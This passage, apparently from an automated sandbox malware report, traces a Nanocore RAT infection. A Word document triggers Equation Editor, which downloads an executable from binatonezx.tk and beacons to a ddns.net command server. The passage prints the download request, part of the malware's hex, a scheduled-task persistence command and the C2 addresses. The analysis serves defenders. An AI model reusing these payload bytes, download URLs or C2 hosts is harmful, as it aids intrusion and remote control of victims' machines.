Oct 26, 2021 14:34:19.427335978 CEST	49178	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:19.468378067 CEST	49178	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:19.774297953 CEST	1665	49178	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:19.774440050 CEST	49178	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:19.774720907 CEST	49178	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:23.819962025 CEST	49179	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:24.110208035 CEST	1665	49179	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:24.110374928 CEST	49179	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:24.111347914 CEST	49179	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:24.415395021 CEST	1665	49179	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:24.415605068 CEST	49179	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:24.415852070 CEST	49179	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:28.475071907 CEST	49180	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:28.774790049 CEST	1665	49180	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:28.774981022 CEST	49180	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:28.776192904 CEST	49180	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:29.086282015 CEST	1665	49180	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:29.086524963 CEST	49180	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:29.086744070 CEST	49180	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:33.545660019 CEST	49181	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:33.840415955 CEST	1665	49181	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:33.840553045 CEST	49181	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:33.840838909 CEST	49181	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:34.143178940 CEST	1665	49181	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:34.143390894 CEST	49181	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:38.162514925 CEST	49182	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:38.459299088 CEST	1665	49182	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:38.459446907 CEST	49182	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:38.459896088 CEST	49182	1665	192.168.2.22	103.133.109.121
Oct 26, 2021 14:34:38.756135941 CEST	1665	49182	103.133.109.121	192.168.2.22
Oct 26, 2021 14:34:38.756398916 CEST	49182	1665	192.168.2.22	103.133.109.121

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2021 14:32:28.342478991 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:32:28.361212969 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 26, 2021 14:32:28.361577034 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:32:28.379965067 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 26, 2021 14:32:46.266288042 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:32:46.286371946 CEST	53	50591	8.8.8.8	192.168.2.22
Oct 26, 2021 14:32:51.516520023 CEST	57805	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:32:51.536900043 CEST	53	57805	8.8.8.8	192.168.2.22
Oct 26, 2021 14:32:51.537348986 CEST	57805	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:32:51.555778980 CEST	53	57805	8.8.8.8	192.168.2.22
Oct 26, 2021 14:32:57.731529951 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:32:57.749866009 CEST	53	59030	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:10.443394899 CEST	59185	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:10.461741924 CEST	53	59185	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:16.875482082 CEST	55616	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:16.896073103 CEST	53	55616	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:23.127830982 CEST	49972	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:23.148868084 CEST	53	49972	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:41.000914097 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:41.021023989 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:45.678149939 CEST	59867	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:45.696860075 CEST	53	59867	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:50.365366936 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:50.383882999 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:55.032602072 CEST	50072	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:55.052700043 CEST	53	50072	8.8.8.8	192.168.2.22
Oct 26, 2021 14:33:55.053576946 CEST	50072	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:33:55.071458101 CEST	53	50072	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:12.061791897 CEST	54304	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:12.080410957 CEST	53	54304	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:12.242664099 CEST	54304	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:12.266231060 CEST	53	54304	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:14.397547007 CEST	54304	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:14.416179895 CEST	53	54304	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:19.109601021 CEST	49894	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:19.127985001 CEST	53	49894	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:23.798602104 CEST	64645	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:23.818476915 CEST	53	64645	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:28.457179070 CEST	53745	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:28.473581076 CEST	53	53745	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:33.526659966 CEST	54358	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:33.544327974 CEST	53	54358	8.8.8.8	192.168.2.22
Oct 26, 2021 14:34:38.143464088 CEST	65017	53	192.168.2.22	8.8.8.8
Oct 26, 2021 14:34:38.161930084 CEST	53	65017	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 26, 2021 14:32:28.342478991 CEST	192.168.2.22	8.8.8.8	0xd208	Standard query (0)	binatonezx.tk	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:28.361577034 CEST	192.168.2.22	8.8.8.8	0xd208	Standard query (0)	binatonezx.tk	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:46.266288042 CEST	192.168.2.22	8.8.8.8	0xcfe	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:51.516520023 CEST	192.168.2.22	8.8.8.8	0x15	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:51.537348986 CEST	192.168.2.22	8.8.8.8	0x15	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:57.731529951 CEST	192.168.2.22	8.8.8.8	0xc64a	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:10.443394899 CEST	192.168.2.22	8.8.8.8	0x36bf	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:16.875482082 CEST	192.168.2.22	8.8.8.8	0xb0d9	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:23.127830982 CEST	192.168.2.22	8.8.8.8	0xdcce	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:41.000914097 CEST	192.168.2.22	8.8.8.8	0x4f0a	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:45.678149939 CEST	192.168.2.22	8.8.8.8	0x57a	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:50.365366936 CEST	192.168.2.22	8.8.8.8	0x29e5	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:55.032602072 CEST	192.168.2.22	8.8.8.8	0x2a58	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:55.053576946 CEST	192.168.2.22	8.8.8.8	0x2a58	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:12.061791897 CEST	192.168.2.22	8.8.8.8	0xe108	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:12.242664099 CEST	192.168.2.22	8.8.8.8	0xe108	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:14.397547007 CEST	192.168.2.22	8.8.8.8	0xe108	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:19.109601021 CEST	192.168.2.22	8.8.8.8	0xeef1	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:23.798602104 CEST	192.168.2.22	8.8.8.8	0xc9c2	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:28.457179070 CEST	192.168.2.22	8.8.8.8	0x8c8b	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:33.526659966 CEST	192.168.2.22	8.8.8.8	0xc6cb	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:38.143464088 CEST	192.168.2.22	8.8.8.8	0xa5da	Standard query (0)	drrkingsleym001.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 26, 2021 14:32:28.361212969 CEST	8.8.8.8	192.168.2.22	0xd208	No error (0)	binatonezx.tk	2.56.59.211	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:28.379965067 CEST	8.8.8.8	192.168.2.22	0xd208	No error (0)	binatonezx.tk	2.56.59.211	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:46.286371946 CEST	8.8.8.8	192.168.2.22	0xcfe	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:51.536900043 CEST	8.8.8.8	192.168.2.22	0x15	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:51.555778980 CEST	8.8.8.8	192.168.2.22	0x15	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:32:57.749866009 CEST	8.8.8.8	192.168.2.22	0xc64a	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:10.461741924 CEST	8.8.8.8	192.168.2.22	0x36bf	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:16.896073103 CEST	8.8.8.8	192.168.2.22	0xb0d9	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:23.148868084 CEST	8.8.8.8	192.168.2.22	0xdcce	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:41.021023989 CEST	8.8.8.8	192.168.2.22	0x4f0a	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:45.696860075 CEST	8.8.8.8	192.168.2.22	0x57a	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:50.383882999 CEST	8.8.8.8	192.168.2.22	0x29e5	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:55.052700043 CEST	8.8.8.8	192.168.2.22	0x2a58	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:33:55.071458101 CEST	8.8.8.8	192.168.2.22	0x2a58	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:12.080410957 CEST	8.8.8.8	192.168.2.22	0xe108	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:12.266231060 CEST	8.8.8.8	192.168.2.22	0xe108	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:14.416179895 CEST	8.8.8.8	192.168.2.22	0xe108	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:19.127985001 CEST	8.8.8.8	192.168.2.22	0xeef1	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:23.818476915 CEST	8.8.8.8	192.168.2.22	0xc9c2	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:28.473581076 CEST	8.8.8.8	192.168.2.22	0x8c8b	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:33.544327974 CEST	8.8.8.8	192.168.2.22	0xc6cb	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)
Oct 26, 2021 14:34:38.161930084 CEST	8.8.8.8	192.168.2.22	0xa5da	No error (0)	drrkingsleym001.ddns.net	103.133.109.121	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

binatonezx.tk

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	2.56.59.211	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2021 14:32:28.425699949 CEST	0	OUT	GET /catzx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: binatonezx.tk Connection: Keep-Alive
Oct 26, 2021 14:32:28.454737902 CEST	2	IN	HTTP/1.1 200 OK Date: Tue, 26 Oct 2021 12:32:28 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Tue, 26 Oct 2021 07:03:38 GMT ETag: "59e00-5cf3c13a7ae42" Accept-Ranges: bytes Content-Length: 368128 Vary: User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 87 77 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 05 00 00 08 00 00 00 00 00 00 f6 b2 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 b2 05 00 4f 00 00 00 00 c0 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 92 05 00 00 20 00 00 00 94 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 c0 05 00 00 06 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b2 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 3f 00 00 e4 41 00 00 03 00 00 00 7d 00 00 06 a4 81 00 00 00 31 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 00 00 00 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 42 6f 02 00 00 06 00 25 1f 50 6f 04 00 00 06 00 25 1f 44 6f 06 00 00 06 00 25 1f 49 6f 08 00 00 06 00 25 1f 57 6f 0a 00 00 06 00 0a 2b 00 06 2a 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 6f 6f 02 00 00 06 00 25 1f 2b 6f 04 00 00 06 00 25 1f 2d 6f 06 00 00 06 00 25 1f 2a 6f 08 00 00 06 00 25 1f 3d 6f 0a 00 00 06 00 0a 2b 00 06 2a 22 02 28 14 00 00 0a 00 2a 00 00 00 13 30 04 00 20 00 00 00 02 00 00 11 00 19 8d 0f 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 37 00 00 70 a2 25 18 02 a2 0a 2b 00 06 2a 26 02 28 14 00 00 0a 00 00 2a 00 00 13 30 02 00 30 00 00 00 03 00 00 11 00 03 6f 23 00 00 06 04 6f 4f 00 00 06 33 10 03 6f 25 00 00 06 04 6f 51 00 00 06 fe 01 2b 01 16 0a 06 2c 05 00 17 0b 2b 05 00 16 0b 2b 00 07 2a 13 30 02 00 30 00 00 00 03 00 00 11 00 03 6f 23 00 00 06 04 6f 23 00 00 06 33 10 03 6f 25 00 00 06 04 6f 25 00 00 06 fe 01 2b 01 16 0a 06 2c 05 00 17 0b 2b 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXwa0 @ @O H.text `.rsrc@@.reloc@BH?A}1{"}{"}{"}{"}{"}08s%Bo%Po%Do%Io%Wo+08s%oo%+o%-o%o%=o+"(0 %rp%r7p%+&(00o#oO3o%oQ+,++*00o#o#3o%o%+,+
Oct 26, 2021 14:32:28.454761982 CEST	3	IN	Data Raw: 00 16 0b 2b 00 07 2a 13 30 02 00 30 00 00 00 03 00 00 11 00 03 6f 4f 00 00 06 04 6f 4f 00 00 06 33 10 03 6f 51 00 00 06 04 6f 51 00 00 06 fe 01 2b 01 16 0a 06 2c 05 00 17 0b 2b 05 00 16 0b 2b 00 07 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 Data Ascii: +00oOoO3oQoQ+,++{"}{"}{"}{"}{"}07s%o%o%o%o%o+{"}*{
Oct 26, 2021 14:32:28.454936981 CEST	5	IN	Data Raw: 02 7b 18 00 00 04 1f 63 1f 19 73 3c 00 00 0a 6f 3d 00 00 0a 00 02 7b 18 00 00 04 16 6f 3e 00 00 0a 00 02 7b 18 00 00 04 72 e1 00 00 70 6f 29 00 00 0a 00 02 7b 18 00 00 04 17 6f 3f 00 00 0a 00 02 7b 18 00 00 04 02 fe 06 3c 00 00 06 73 40 00 00 0a Data Ascii: {cs<o={o>{rpo){o?{<s@oA{Y as9o:{rpo;{Ps<o={o>{rpo){o?{>s@oA{ as9o:{
Oct 26, 2021 14:32:28.454955101 CEST	6	IN	Data Raw: 00 00 11 00 02 7b 1e 00 00 04 6f 68 00 00 06 02 7b 1e 00 00 04 6f 6a 00 00 06 28 57 00 00 0a 00 28 58 00 00 0a 0b 12 01 28 59 00 00 0a 0a 02 7b 1e 00 00 04 02 7b 1e 00 00 04 6f 68 00 00 06 6f 6c 00 00 06 00 02 7b 1e 00 00 04 02 7b 1e 00 00 04 6f Data Ascii: {oh{oj(W(X(Y{{ohol{{ojom%YEO+Q;8{oh{oj(Wrp(Z{%ohYoi8{oh{oj(Wrp(Z{
Oct 26, 2021 14:32:28.454981089 CEST	7	IN	Data Raw: 00 00 38 19 01 00 00 02 7b 1e 00 00 04 06 8c 45 00 00 01 6f 6e 00 00 06 00 02 7b 1e 00 00 04 07 8c 45 00 00 01 6f 6f 00 00 06 00 38 f2 00 00 00 73 a4 00 00 06 13 05 11 05 06 7d 41 00 00 04 11 05 07 7d 42 00 00 04 02 7b 26 00 00 04 11 05 6f 6d 00 Data Ascii: 8{Eon{Eoo8s}A}B{&om8s\|}7}8{#on8s}G}H{$oo+ws}{};{}<+Rs]o5o6{'op
Oct 26, 2021 14:32:28.454998970 CEST	9	IN	Data Raw: 0e 04 28 83 00 00 06 28 7f 00 00 06 00 02 05 02 28 7e 00 00 06 28 84 00 00 06 28 7f 00 00 06 00 2a 00 00 13 30 04 00 25 00 00 00 15 00 00 11 00 73 76 00 00 0a 0a 06 1a 1f 10 6f 7d 00 00 0a 06 1e 1f 14 6f 7d 00 00 0a 02 17 73 80 00 00 06 0b 2b 00 Data Ascii: (((~((0%svo}o}s+0rprp(s\|+0s~+ns+Ls,,Y.,Y++,os}EoX
Oct 26, 2021 14:32:28.455018044 CEST	10	IN	Data Raw: 00 07 00 00 00 05 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 07 00 00 00 05 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 07 00 00 00 05 00 00 11 00 17 0a 2b 00 06 2a 00 13 30 01 00 07 00 00 00 05 00 00 11 00 17 0a 2b 00 06 2a 3e 02 16 7d 43 00 Data Ascii: +0+0+0+>}C(V(o}F0{G+&}G0{H+&}H0"HB+0{I+0
Oct 26, 2021 14:32:28.455034971 CEST	11	IN	Data Raw: 12 0a 00 18 12 65 12 0a 00 7b 0b 65 12 06 00 71 0e dd 00 12 00 a4 0e 50 0b 12 00 61 10 50 0b 06 00 34 0d 2d 0d 06 00 98 14 2d 0d 06 00 95 0e 2d 0d 5b 00 a0 10 00 00 06 00 d2 0e dd 00 06 00 fc 08 2d 0d 06 00 34 00 2d 0d 06 00 3f 00 2d 0d 0e 00 38 Data Ascii: e{eqPaP4---[-4-?-8Oz``?-cenee--ke eP*Pe-e-P--
Oct 26, 2021 14:32:28.455051899 CEST	13	IN	Data Raw: 20 00 00 00 00 96 00 5c 13 71 04 06 00 30 21 00 00 00 00 86 18 b5 10 06 00 06 00 3c 21 00 00 00 00 96 00 0a 08 76 04 06 00 68 21 00 00 00 00 86 18 b5 10 06 00 07 00 74 21 00 00 00 00 86 00 ac 02 7d 04 07 00 b0 21 00 00 00 00 86 00 ac 02 85 04 09 Data Ascii: \q0!<!vh!t!}!!("0"9"A"J"{R"["c"l"t""
Oct 26, 2021 14:32:28.455070019 CEST	14	IN	Data Raw: 02 01 00 3e 00 ac 35 00 00 00 00 83 00 58 01 01 00 3f 00 ac 35 00 00 00 00 83 00 e6 01 01 00 40 00 ac 35 00 00 00 00 83 00 4b 01 e6 04 41 00 ac 35 00 00 00 00 83 00 d9 01 e6 04 42 00 30 21 00 00 00 00 86 18 b5 10 06 00 43 00 b4 35 00 00 00 00 e6 Data Ascii: >5X?5@5KA5B0!C5fC5C5C5+D5ID6DE6E46XfEH6fE\6fEp6'fE6E
Oct 26, 2021 14:32:28.480618000 CEST	16	IN	Data Raw: 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 0a 00 00 01 00 f0 Data Ascii: i------Fub

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2660 Parent PID: 596

General

Start time:	14:31:29
Start date:	26/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fdb0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2724 Parent PID: 596

General

Start time:	14:31:31
Start date:	26/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: catzjt7863.exe PID: 1848 Parent PID: 2724

General

Start time:	14:31:32
Start date:	26/10/2021
Path:	C:\Users\user\AppData\Roaming\catzjt7863.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\catzjt7863.exe
Imagebase:	0x960000
File size:	368128 bytes
MD5 hash:	ACE96CF7EF24EEAC993B4DA172A5A8F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.454727273.00000000024A6000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2024 Parent PID: 1848

General

Start time:	14:31:37
Start date:	26/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'
Imagebase:	0xef0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 2936 Parent PID: 1848

General

Start time:	14:31:38
Start date:	26/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
